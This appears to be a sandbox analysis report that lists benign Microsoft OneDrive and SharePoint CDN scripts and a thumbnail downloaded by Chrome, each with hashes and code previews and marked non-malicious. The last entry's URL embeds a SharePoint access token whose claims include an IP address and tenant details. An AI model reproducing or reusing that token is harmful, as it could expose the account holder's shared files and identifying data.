                              SHA-512:4EE48A1B02FD832197FEA6E696B2903DB4EA7330FFE1C0CAEF6F763057352A981E2984C700EFC038544EF3DC19E40A1B21BD8A2F0829090A318FE17FA5519384
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-teams/en-us/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{788:e=>{e.exports=JSON.parse('{"a":"Something went wrong","c":"Try refreshing the page","b":"Something went wrong and we couldn\\u0027t get the page to display."}')}.,1640:e=>{e.exports=JSON.parse('{"a":"Open in Immersive Reader"}')}.,277:e=>{e.exports=JSON.parse('{"b":"Add shortcut to My files","d":"Add shortcut to OneDrive","n":"Remove","p":"Remove shortcut from My files","y":"Remove from shared list","a":"Add a shortcut to this folder in My files","o":"Remove the shortcut to this folder from My files","c":"Add a shortcut to this folder in OneDrive","m":"Remove the selected shortcut from this location","f":"Add shortcut to Albums","e":"Add a shortcut to this shared album in albums","k":"Open file location","t":"Date","s":"Any date","u":"Last 24 hours","w":"Last week","v":"Last month","x":"Last year","l":"Photos","r":"Type","g":"Any Type","i":"Folders","h":"Documents","j":"Music","q":"PC Syn
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (9526)
                              Category:downloaded
                              Size (bytes):16354
                              Entropy (8bit):5.33599347735153
                              Encrypted:false
                              SSDEEP:
                              MD5:8353EE6A069EABDFC842006E28BDCD95
                              SHA1:51A1B5931ACD99E4657AD2B27E4385286C6086FC
                              SHA-256:05E89036751C4A4527DD2074DB3B97FC97164397F18257E6D0891428088F952A
                              SHA-512:7B5965178F8A91E96DA75E28C1D4B81789BF7BA4FF21DB1843D7833BBD27C854989F44DDC428FF2742F179CCBD6B9FF1F8FF8770112ECE929B352CE97D6AA640
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/plt.preact.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["plt.preact"],{1:(e,t,n)=>{n.d(t,{a:()=>v,b:()=>g,c:()=>R,d:()=>_,e:()=>b,f:()=>i,g:()=>H,h:()=>_});var a,i,r,o,s,c,d,l={},u=[],f=/acit|ex(?:s|g|n|p|$)|rph|grid|ows|mnc|ntw|ine[ch]|zoo|^ord|itera/i;function p(e,t){for(var n in t)e[n]=t[n];return e}function m(e){var t=e.parentNode;t&&t.removeChild(e)}function _(e,t,n){var i,r,o,s={};for(o in t)"key"==o?i=t[o]:"ref"==o?r=t[o]:s[o]=t[o];if(arguments.length>2&&(s.children=arguments.length>3?a.call(arguments,2):n),"function"==typeof e&&null!=e.defaultProps)for(o in e.defaultProps)void 0===s[o]&&(s[o]=e.defaultProps[o]);return h(e,s,i,r,null)}function h(e,t,n,a,o){var s={type:e,props:t,key:n,ref:a,__k:null,__:null,__b:0,__e:null,__d:void 0,__c:null,__h:null,constructor:void 0,__v:o??++r};return null==o&&null!=i.vnode&&i.vnode(s),s}function b(){return{current:null}}function g(e){return e.children}function v(e,t){this.props=e,this.context=t}function y(e,t){if(null==t
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2516)
                              Category:downloaded
                              Size (bytes):8072
                              Entropy (8bit):5.246345786256847
                              Encrypted:false
                              SSDEEP:
                              MD5:7B8DA3F40402F8FF002385733B0C0098
                              SHA1:A3560A3914B92DC295B6941FAF49087F1F85F389
                              SHA-256:56FEC8312AEA89FCDD7F66E5D531D4AC3AFA8984E0FE3054795D5704A581E269
                              SHA-512:FCEC4009D734905D94F078F0784CEDCB85D2023979638733FB5CFAD09951FB1C59C6794DF5E5286289730DE38A0250AAD5FD3B8322CE14346B3FCB540EBE8CFF
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1469.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1469],{3050:function(e,t,n){var a=n(1327),i=n("odsp.util_578"),r=n(220),o=n(43),s=function(){function e(e){this._itemUrlHelper=e.itemUrlHelper,this._sharingContextInformation=e.sharingContextInformation}return e.prototype.getApiRoot=function(e,t,n,s){var c,d,l,u,f,p,m,_,h;if(void 0===s&&(s=!1),this._sharingContextInformation){var b=this._sharingContextInformation,g=b.isFolder,v=b.isListSharing,y=b.itemUrl,S=b.listId,D=b.listItemId,I=b.listUrl,x=b.resourceId,C=b.serverRelativeItemUrl,O=b.uniqueId,w=b.webAbsoluteUrl,E=(s&&null!==(d=null===(c=null==t?void 0:t.properties)||void 0===c?void 0:c.listId)&&void 0!==d?d:S)||"",A=(s&&null!==(u=null===(l=null==t?void 0:t.properties)||void 0===l?void 0:l.ID)&&void 0!==u?u:D)||"",L=(s&&null!==(p=null===(f=null==t?void 0:t.properties)||void 0===f?void 0:f.uniqueId)&&void 0!==p?p:O)||"";if(v)return e.build().webByUrl({webUrl:w}).method("Lists",S);if(O){if(S)return e.build().
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (65471)
                              Category:downloaded
                              Size (bytes):427548
                              Entropy (8bit):5.349338791756901
                              Encrypted:false
                              SSDEEP:
                              MD5:4100EC2D6D7816E2532B5AB2E20D6AA0
                              SHA1:B8E040B4A2428AB0C0FA9002287B0A43DA906D36
                              SHA-256:A123A739279167325B3854788804ED55F486C667C66D61B0B9F7FA6D6E290B97
                              SHA-512:974F0DEEC20AD5E7E8F8DC759758095581BA4BC74EC731298EA604B712D0C5F368BF12CDFD5ADBDC92D7D25BEDB6E28D105549C034C8BC612787613DAFE0D1F6
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/43044.js
                              Preview:/*! For license information please see 43044.js.LICENSE.txt */.(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[43044],{243044:(e,t)=>{!function(){var e="undefined"!=typeof window?window:global,n={};for(var a in function(e,t,n){var a;function i(e){var t=0;return function(){return t<e.length?{done:!1,value:e[t++]}:{done:!0}}}var r="function"==typeof Object.defineProperties?Object.defineProperty:function(e,t,n){return e==Array.prototype||e==Object.prototype||(e[t]=n.value),e},o=function(n){n=["object"==typeof globalThis&&globalThis,n,"object"==typeof e&&e,"object"==typeof self&&self,"object"==typeof t&&t];for(var a=0;a<n.length;++a){var i=n[a];if(i&&i.Math==Math)return i}throw Error("Cannot find global object")}(this);function s(e,t){if(t)e:{var n=o;e=e.split(".");for(var a=0;a<e.length-1;a++){var i=e[a];if(!(i in n))break e;n=n[i]}(t=t(a=n[e=e[e.length-1]]))!=a&&null!=t&&r(n,e,{configurable:!0,writable:!0,value:t})}}function c(e){return(e={next:e})[Symb
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5385)
                              Category:downloaded
                              Size (bytes):8262
                              Entropy (8bit):5.41705867674518
                              Encrypted:false
                              SSDEEP:
                              MD5:F4BF3F2E8F69B5F5789DA989057B8065
                              SHA1:B4E02A9688D79EF006A206B455474BD4EA273899
                              SHA-256:2ADCDBA6BA3FC92E161B4F4DF2EC45436ABEF6679FEDBAFABEA29BF823B86385
                              SHA-512:9EA4461A00AA6B186C5AB5FA027F45D7CB38DE108C2B0242E1AD0B5E79A66BD30734B10336F966F3DE252F4D7BFD2B36D8557514838B5A599002D5AF9E73E788
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/8832.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[8832],{332987:(e,t,n)=>{n.d(t,{L:()=>l});var a=n(295610),i=n(408156),r=n(138968),o=n(168984),s=n(824591),c=n(713106),d=n(40867);function l(e,t){void 0===t&&(t={});var n=t.factoryOptions,l=(void 0===n?{}:n).defaultProp,f=function(n){var c,d,l,f,p=(c=t.displayName,d=i.useContext(o.i),l=t.fields,f=["theme","styles","tokens"],s.X.getSettings(l||f,c,d.customizations)),m=t.state;m&&(n=(0,a.__assign)((0,a.__assign)({},n),m(n)));var _=n.theme||p.theme,h=u(n,_,t.tokens,p.tokens,n.tokens),b=function(e,t,n){for(var a=[],i=3;i<arguments.length;i++)a[i-3]=arguments[i];return r.L$.apply(void 0,a.map(function(a){return"function"==typeof a?a(e,t,n):a}))}(n,_,h,t.styles,p.styles,n.styles),g=(0,a.__assign)((0,a.__assign)({},n),{styles:b,tokens:h,_defaultStyles:b,theme:_});return e(g)};return f.displayName=t.displayName||e.name,l&&(f.create=(0,c.gw)(f,{defaultProp:l})),(0,d.f)(f,t.statics),f}function u(e,t){fo
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4172)
                              Category:downloaded
                              Size (bytes):4177
                              Entropy (8bit):5.3131015305928795
                              Encrypted:false
                              SSDEEP:
                              MD5:9DFD293B3A888E1FAFD005E6D69B91D5
                              SHA1:E22D5643B7FC17B2835839CD6766DD32988BD02B
                              SHA-256:994987F5EF20B4A82FBEFC9EE9FA2F90775D3AC9A16A37DD729A72B61A403120
                              SHA-512:EF1A2072846BBEE3F5B8EDF4BCE1035367B81EE2BC39A5490023575FFF03A0FA9B730661EF3CB5DD7058034A8D1F4A6F285F3DD7B8EC7FA4765DE3BFA20B87ED
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/46.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[46],{734:(e,t,n)=>{n.r(t),n.d(t,{moveToNextCellInRow:()=>u,onCellMouseDown:()=>d,onCellMouseDrag:()=>l,onMovementKeyDown:()=>c});var a=n(787),i=n(20),r=n(83),o=n(3),s=n(84);function c(e,t){t.preventDefault(),t.shiftKey&&"Tab"!==t.key?function(e,t){var n=e.rootRef,i=e.focusedItemKey,r=e.focusedColumnKey,s=e.selection,c=e.selectCellRange;if(i&&r&&"cellRange"===s.type){var d=s,l=void 0,u=void 0,p=void 0,m=void 0;if(a.b.has(t.key)){var _="ArrowDown"===t.key?"next":"prev";i===d.beginRowKey?p=(0,o.cb)(n.current,d.endRowKey,_):l=(0,o.cb)(n.current,d.beginRowKey,_)}else if(a.a.has(t.key)){var h=void 0;switch(t.key){case"ArrowLeft":h=-1;break;case"ArrowRight":h=1;break;case"Home":h=a.c;break;case"End":h=a.d;break;default:h=0}r===d.beginColKey?m=f(e,d.endColKey,h,!1):u=f(e,d.beginColKey,h,!1)}c({beginRowKey:null!=l?l:d.beginRowKey,beginColKey:null!=u?u:d.beginColKey,endRowKey:null!=p?p:d.endRowKey,endColKey:null!=m?m:d
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (4716)
                              Category:downloaded
                              Size (bytes):9520
                              Entropy (8bit):5.00342575312255
                              Encrypted:false
                              SSDEEP:
                              MD5:99753BD74916B620A72AC7B652873795
                              SHA1:9473195737EE6FAD1B361EC9B440CCD9A4C1E27D
                              SHA-256:4CE28BF16084016908031D5E07A3A8D4D40639B5394A5B44794AA25141746566
                              SHA-512:D810593DCA9033EB0BF50578DA9BC437146EC41316D682CC0FF79037D1F1A44A0070E98694B19BDDB5AFD8D39D6E4304EF6BF133F4C4BAE1567F0ACFC82E6E6C
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/es/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{50:e=>{e.exports=JSON.parse('{"b":"Solo disponible cuando est. en l.nea","a":"{0}. Deshabilitado mientras se est. sin conexi.n"}')}.,184:e=>{e.exports=JSON.parse('{"t":"Rojo oscuro","u":"Rojo","v":"Naranja","w":"Verde","x":"Verde oscuro","y":"Verde azulado","z":"Azul","A":"Azul marino","B":"P.rpura azul","C":"Azul oscuro","D":"Lavanda","E":"Rosa","o":"Cohete","n":"Robot","e":"Bicho","a":"Avi.n","f":"Calendario","s":"Destino","g":"Portapapeles","i":"Paleta de colores","l":"Bombilla","j":"Cubo","c":"Vaso de precipitaci.n","p":"Hucha de cerdito","r":"Lista de reproducci.n","k":"Hospital","b":"Banco","m":"Indicador de mapa","h":"Taza de caf.","q":"Carro de la compra","d":"Pastel de cumplea.os"}')}.,186:e=>{e.exports=JSON.parse('{"RelativeDateTime_AFewSeconds":"Hace unos segundos","RelativeDateTime_AFewSeconds_StartWithLowerCase":"hace unos segundos","RelativeDateTime_AFewSecondsFuture":
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (11289)
                              Category:downloaded
                              Size (bytes):459721
                              Entropy (8bit):5.041469202420313
                              Encrypted:false
                              SSDEEP:
                              MD5:5246689BCBD90C8226C5E8B4C351F049
                              SHA1:0A7F82CCA882F5ACD5B06E7381BBEF36D6ACD91B
                              SHA-256:40040EFB2AA2A21B71C3B1553B04749DD104668408A0D30AD2E084AC050ACE51
                              SHA-512:3E8DE5AEBBC1F362B4AC473AB85D039952ED6B678BBB9495B98C97CED8E1E409E1FB4DFB6462ACD37FDA8EE3BF3EDFF3E7901478BDFA2078E680908CF3DBC26C
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-teams/en-us/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6474:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7214:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (27278)
                              Category:downloaded
                              Size (bytes):96281
                              Entropy (8bit):5.380104079788974
                              Encrypted:false
                              SSDEEP:
                              MD5:90E89078F520F7DA0011AE971FBF040F
                              SHA1:F5B716E208AE26EEFF2C8266914BB531D38DE0D0
                              SHA-256:1735E053D48B12AA7FE2C37901B24ADCA2F81AF5AFA39772A4D40497E2D477D4
                              SHA-512:11D6C1ED35D3D11B94B8A8B2E201AECD80ED9DF8FAB67A6B867EAFE493F30C4C2843A5055B81C32C1309E111E79153A185CC7263B89E96D386F15BD4C4A8EA27
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/109.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[109,644,107],{2771:function(e,t,n){var a;n.d(t,{a:function(){return a}}),function(e){e[e.View=0]="View",e[e.Edit=1]="Edit",e[e.Extract=2]="Extract",e[e.Esign=3]="Esign"}(a||(a={}))}.,2483:function(e,t,n){n.d(t,{a:function(){return p},b:function(){return _},c:function(){return m},d:function(){return g},e:function(){return c},f:function(){return s},g:function(){return o},h:function(){return d},i:function(){return l},j:function(){return u},k:function(){return f},l:function(){return h},m:function(){return i},n:function(){return a},o:function(){return r},p:function(){return b}});var a=.5,i=5,r=90,o=14,s=3,c=7,d=5,l=5,u=150,f=96,p=100,m=1,_=255,h=1e8,b="MsPdfViewer.ZOOM_OPTION_STORE_KEY",g="MsPdfViewer.CACHED_DISPLAY_INFO_ARRAY_STORE_KEY"}.,2166:function(e,t,n){n.d(t,{a:function(){return a.a},b:function(){return a.c},c:function(){return a.d}});var a=n(940)}.,2884:function(e,t,n){n.d(t,{a:function(){return i},b:func
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (6696)
                              Category:downloaded
                              Size (bytes):739345
                              Entropy (8bit):5.6986835648815495
                              Encrypted:false
                              SSDEEP:
                              MD5:5B76008FC5A4AAA241FA3A8E693F917B
                              SHA1:73CC007E27F5B14A24F2DB73EFE1E8CD2FB289E3
                              SHA-256:89D9DBD8FD743FD7BEE68D6653C7EABA19AF0ED78FC562D51D3A5C4875BE1AD5
                              SHA-512:D84C9CA1AEE078063E76C19FFE4A68F549F3A96AC6247550544F7DF56AD08E4A324444BFA8FF9BA3CA31828D9D9AF9306942FDA3BC6430826C1A07240B92D210
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/ja/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{5223:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,5968:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (19271)
                              Category:downloaded
                              Size (bytes):72074
                              Entropy (8bit):5.5497822785419
                              Encrypted:false
                              SSDEEP:
                              MD5:ADA83C43C262B32268C5F96A5668B5D2
                              SHA1:A28ADC6A9B3DFB2B205DBAD8FCB320D37D0803B3
                              SHA-256:939848277AB9BB92BF13EB30D72C4037062E95EC8581E813CB06FC8373E301AA
                              SHA-512:2D3FDBB64F46F8E728219A98622076D0C2F768BA58BE86BF8CFC1FA905D895B2A8D971536AECBC862908F7ADAD4C0C12446D1C2CB8080A97785305D42533C64A
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/67934.js
                              Preview:/*! For license information please see 67934.js.LICENSE.txt */."use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[67934],{211065:(e,t,n)=>{function a(e){for(var t,n=0,a=0,i=e.length;i>=4;++a,i-=4)t=1540483477*(65535&(t=255&e.charCodeAt(a)|(255&e.charCodeAt(++a))<<8|(255&e.charCodeAt(++a))<<16|(255&e.charCodeAt(++a))<<24))+(59797*(t>>>16)<<16),n=1540483477*(65535&(t^=t>>>24))+(59797*(t>>>16)<<16)^1540483477*(65535&n)+(59797*(n>>>16)<<16);switch(i){case 3:n^=(255&e.charCodeAt(a+2))<<16;case 2:n^=(255&e.charCodeAt(a+1))<<8;case 1:n=1540483477*(65535&(n^=255&e.charCodeAt(a)))+(59797*(n>>>16)<<16)}return(((n=1540483477*(65535&(n^=n>>>13))+(59797*(n>>>16)<<16))^n>>>15)>>>0).toString(36)}n.d(t,{Z:()=>a})}.,230985:(e,t,n)=>{n.d(t,{BK9:()=>r,Ee2:()=>a,Ej2:()=>l,F5e:()=>o,GK8:()=>u,H1R:()=>_,KaI:()=>i,PG3:()=>m,YdH:()=>s,e2Z:()=>d,iNZ:()=>p,mlP:()=>c,wg7:()=>f});const a="Enter",i=" ",r="Tab",o="ArrowDown",s="ArrowLeft",c="ArrowRight",d="ArrowUp",l="En
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (60325)
                              Category:downloaded
                              Size (bytes):148663
                              Entropy (8bit):5.337526735647962
                              Encrypted:false
                              SSDEEP:
                              MD5:329E96FA0D3934243ACF2D5E49A2F8BD
                              SHA1:E912A029AE62CC89923AEC9ED3AEE16624794B49
                              SHA-256:C212ABFB5B7940845D95E1BC4726EB4F9330EAD4BB1EF1C9D60D856ECF450DE8
                              SHA-512:A82266E714CB1EF1CD7EF216D4B4B7BBA2C39F6E4A6D96D0A9D0379D048C58BA6231102BB2876F4B70F99A0A0C2E262972F5A6F840081DF415C555B1CBDCDF1A
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-12.003/spwebworker.js
                              Preview:/*! For license information please see spwebworker.js.LICENSE.txt */.(()=>{"use strict";var e=[(e,t,n)=>{function a(e,t){for(var n="";n.length<e;){var a=16*(null!=t?t:Math.random)();n+=(a|=0).toString(16)}return n}function i(){return crypto.getRandomValues(new Uint32Array(1))[0]/4294967296}n.r(t),n.d(t,{Empty:()=>r,_guidRegEx:()=>o,cryptoRandom:()=>i,generate:()=>s,isValidGuid:()=>u,normalizeDashes:()=>l,normalizeLower:()=>c,normalizeUpper:()=>d});var r="00000000-0000-0000-0000-000000000000",o=/^[0-9a-f]{8}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{12}$/i;function s(e){var t=[];t.push(a(8,e)),t.push(a(4,e));var n="4"+a(3,e);t.push(n);var i=a(4,e),r=parseInt(i[0],16);return r&=3,i=(r|=8).toString(16)+i.substr(1),t.push(i),t.push(a(12,e)),t.join("-")}function c(e,t){return void 0===t&&(t=!1),e?f(e.toLowerCase(),t):""}function d(e,t){return void 0===t&&(t=!1),e?f(e.toUpperCase(),t):""}function l(e,t){if(void 0===t&&(t=!1),e){var n=e.replace(/[^A-Fa-f0-9]/g,"");if(32===n.length)retu
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (9289)
                              Category:downloaded
                              Size (bytes):76583
                              Entropy (8bit):5.315840064821348
                              Encrypted:false
                              SSDEEP:
                              MD5:BE46FFAF3076BF75C2414F0310A72A4A
                              SHA1:BDC46050E9F34218B0EC5700EB429319321C8C9C
                              SHA-256:A809F16F48D0BFFC392265EDE89F9DF21B97B178FF6A1A5637AF52D7166123D3
                              SHA-512:E1D1C2CEED9951C047D6694FCD76D6AA6B841D2694D6EA1E2BD7CAD56C85D0A6110D78844BAD68C03AB1E5DDD65353FC4EFD918DF4328C1EF70B14220CD674FE
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/31.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[31],{844:(e,t,n)=>{n.d(t,{a:()=>o,b:()=>r,c:()=>s});var a=n(830),i=n(829),r=new i.a("errorHandler"),o=new a.a("configuration",{}).serialize({}),s=new i.a("getItemsBatchThrottle")}.,856:(e,t,n)=>{n.d(t,{a:()=>d,b:()=>l,c:()=>f,d:()=>u,e:()=>m,f:()=>p});var a={};n.r(a),n.d(a,{failed:()=>s,resolved:()=>o,unresolved:()=>r,unsupported:()=>c});var i=n(829),r="",o="resolved",s="failed",c="unsupported",d=a,l=new i.a("error");function u(e){return!e}function f(e){return!!e}var p=new i.a("resolvedAsKeyFacetFacet"),m=new i.a("requestCanary")}.,852:(e,t,n)=>{n.d(t,{a:()=>c,b:()=>l,c:()=>d});var a=n(830),i=n(324),r=n("fui.util_150"),o=n(829),s=new a.a("keyFacet",{keyFacetId:i.b});function c(e){return s.matches(e)}(0,r.bQ)(function(e){return s.serialize({keyFacetId:e.id})});var d=new o.a("preferredKeyFacet"),l=new o.a("operationHandlerConfiguration")}.,843:(e,t,n)=>{n.d(t,{a:()=>r});var a=n("tslib_102"),i=n(327),r=function(
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1377)
                              Category:downloaded
                              Size (bytes):1945
                              Entropy (8bit):5.5371700731049165
                              Encrypted:false
                              SSDEEP:
                              MD5:0222EED5C708F5BB9C65F5AC851AC314
                              SHA1:67278FE97A04D5DFDD89B9298E301CE2C3E949FD
                              SHA-256:3AC7FFC1D2E1D57B1C7B0BBE2A4AE22B629FA44AA196C3A73A2B0651D605E214
                              SHA-512:FBEDC77160019803DC81EF21B60B047A94ACF6E8E51823E1DD595772EC18C91EFD2E8275EABCDA800C0E204B06A17903509E80E8B9901446EDDC298E3ED070FC
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/45.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[45],{377:(e,t,n)=>{n.r(t),n.d(t,{getNeedsAttentionView:()=>l});var a=n("tslib_102"),i=n(149),r=n(470),o=n(5),s=n(54),c=n(1548),d=n("odsp.util_578");function l(e){var t=e.contentTypes,n=e.listTemplateType,l=(0,o.g)(n)?"LinkTitle":"LinkFilename",u={},f=[];if(t)for(var p=0,m=t;p<m.length;p++){var _=m[p];if(_.contentTypeId&&_.requiredFields&&_.requiredLookups){for(var h={fieldName:"ContentTypeId",operator:"Eq",values:[_.contentTypeId]},b=r.a(h),g=[],v=_.requiredFields.split(","),y=_.requiredLookups.split(","),S=0;S<v.length;S++){var D=v[S],I="True"===y[S];void 0===u[D]&&(u[D]=I);var x={fieldName:D,lookupId:!!I||void 0,operator:"Eq",values:[""]};g.push(x)}var C=r.c(g,"Or");if(C){var O=r.c([b,C],"And");f.push(O)}}}0===f.length&&f.push(r.a({fieldName:"FileLeafRef",operator:"Eq",values:[""]}));var w=Object.keys(u),E=w.map(function(e){return u[e]}),A=(0,a.AE)((0,a.AE)(["DocIcon",l,"Editor","Modified"],w,!0),["FileDirR
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 285 x 214, 8-bit/color RGBA, non-interlaced
                              Category:downloaded
                              Size (bytes):29022
                              Entropy (8bit):7.969889034819342
                              Encrypted:false
                              SSDEEP:
                              MD5:FEC14161A28EE346BA8163C515727476
                              SHA1:5BEBE472385D83A6AFC77044C4230B85A6CD5866
                              SHA-256:DAF1950F90CCB2C9F7696DAA7A2C637180D3D1B6503239872D6E8494D1C2F9B8
                              SHA-512:0777E5819E21A8352156E9B3B2412CBAE3DF7859A348DB3A0DFE1CDFD05F0D4A662B83E8ADFD0D12C3DD13F5727D80362C135BBB5AC5220E8895B2C25216A39A
                              Malicious:false
                              Reputation:unknown
                              URL:https://eastus1-mediap.svc.ms/transform/thumbnail?provider=spo&inputFormat=png&cs=fFNQTw&docid=https%3A%2F%2Fnetorgft3648903-my.sharepoint.com%3A443%2F_api%2Fv2.0%2Fdrives%2Fb!XylRZ5Oyd0Szxdx-UJ1aUeSJ1ExD4GFIv8N3WGt4tBWuOUOv-I3tS6fXJvcmSgd7%2Fitems%2F01KPQEI7B4U43KAJ4LIZDL443MPSXT7ACV%3Fversion%3DPublished&access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiIwMDAwMDAwMy0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAvbmV0b3JnZnQzNjQ4OTAzLW15LnNoYXJlcG9pbnQuY29tQGYzZjcwNWE1LWNkODEtNGFlYy1hNjM0LTk4YTY0M2ExYjBkOSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jYzI1NmJmMTZjMWYwMjA4OWRmMDUwNWZmYzhhYzFkYzliY2FiMTg2MWU2NzU3ZDQyZWRiODJmNDgyMGVjZDY0MiIsImVuZHBvaW50dXJsIjoiQVdCWEtpc1Z2aml6aXVpelZSUVlKY0VUcDlmSWgwS3Z2emxDcWduWHM4az0iLCJlbmRwb2ludHVybExlbmd0aCI6IjEyNSIsImV4cCI6IjE3MTQwNjgwMDAiLCJpcGFkZHIiOiIxODUuMTUyLjY2LjIzMCIsImlzbG9vcGJhY2siOiJUcnVlIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwIiwiaXN1c2VyIjoidHJ1ZSIsIm5hbWVpZCI6IjAjLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uI2MyNTZiZjE2YzFmMDIwODlkZjA1MDVmZmM4YWMxZGM5YmNhYjE4NjFlNjc1N2Q0MmVkYjgyZjQ4MjBlY2Q2NDIiLCJuYmYiOiIxNzE0MDQ2NDAwIiwibmlpIjoibWljcm9zb2Z0LnNoYXJlcG9pbnQiLCJzaGFyaW5naWQiOiI1bzE2am95YVkwQ3d2b3d3NDIxTit3Iiwic2l0ZWlkIjoiTmpjMU1USTVOV1l0WWpJNU15MDBORGMzTFdJell6VXRaR00zWlRVd09XUTFZVFV4Iiwic25pZCI6IjYiLCJzdHAiOiJ0IiwidHQiOiIwIiwidmVyIjoiaGFzaGVkcHJvb2Z0b2tlbiJ9.-3noFv